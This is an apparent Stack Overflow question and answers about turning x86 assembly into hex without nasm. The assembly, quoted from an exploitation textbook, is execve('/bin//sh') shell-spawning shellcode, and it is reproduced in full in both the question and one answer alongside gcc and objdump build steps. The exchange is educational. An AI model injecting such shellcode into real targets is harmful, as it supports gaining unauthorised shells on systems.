1

I have the following assembly code to spawn a shell from Erickson's exploit book:

; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; Zero out eax.
push eax ; Push some nulls for string termination.
push 0x68732f2f ; Push "//sh" to the stack.
push 0x6e69622f ; Push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp.
push eax ; Push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; Push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
mov al, 11 ; Syscall #11.
int 0x80 ; Do it.

However, my linux machine doesn't have nasm and to get it requires me to fetch my administrator to download the package. Are there any other ways to get this into hex? I know GCC uses AT&T, but I don't know of any methods that support Intel x86.

Kurt Wagner
  • 3,295
  • 13
  • 44
  • 71
  • See http://stackoverflow.com/questions/9347909/can-i-use-intel-syntax-of-x86-assembly-with-gcc If that doesn't work and you feel it's too much hassle to get your admin to let you download nasm, you could just rewrite the code in AT&T syntax. – Michael Dec 02 '14 at 08:37
  • Forgive my Linux foo, but would that be gcc assem.s -masm=intel objFileToGetHexed.o ? I'm running across a No such file or directory for the .o file which doesn't make sense to me... – Kurt Wagner Dec 02 '14 at 08:53
  • No, I believe you'd add that in your source file. – Michael Dec 02 '14 at 08:54
  • Can't you install `nasm`, perhaps compiling it from source code and installing it in your private directory (e.g. your `$HOME/bin/`) ?? – Basile Starynkevitch Dec 02 '14 at 10:40

2 Answers2

3

Maybe an online assembler can help:
http://www2.onlinedisassembler.com/odaweb/
https://defuse.ca/online-x86-assembler.htm

Dirk Wolfgang Glomp
  • 194
  • 1
  • 3
3

To get only a hex-dump you don't need a valid executable. In your case (no relocations) I see no problems to assemble the code at home with your assembler on your operating system, get the hex-dump and use it on the target system. Just take care of the architecture (i386 or x86_64).

Here are the steps to get the hex-dump on Linux:

test.s (lowercase '.s')

.intel_syntax noprefix
.text
.global _start
_start:

xor eax, eax # Zero out eax.
push eax # Push some nulls for string termination.
push 0x68732f2f # Push "//sh" to the stack.
push 0x6e69622f # Push "/bin" to the stack.
mov ebx, esp # Put the address of "/bin//sh" into ebx, via esp.
push eax # Push 32-bit null terminator to stack.
mov edx, esp # This is an empty array for envp.
push ebx # Push string addr to stack above null terminator.
mov ecx, esp # This is the argv array with string ptr.
mov al, 11 # Syscall #11.
int 0x80 # Do it.

Consider to change the comment sign ; to #.

Build and get the hex-dump:

gcc -m32 -c test.s
objdump -F -s -j.text test.o

You can also use gdb test.o and disass/r _start

rkhb
  • 14,159
  • 7
  • 32
  • 60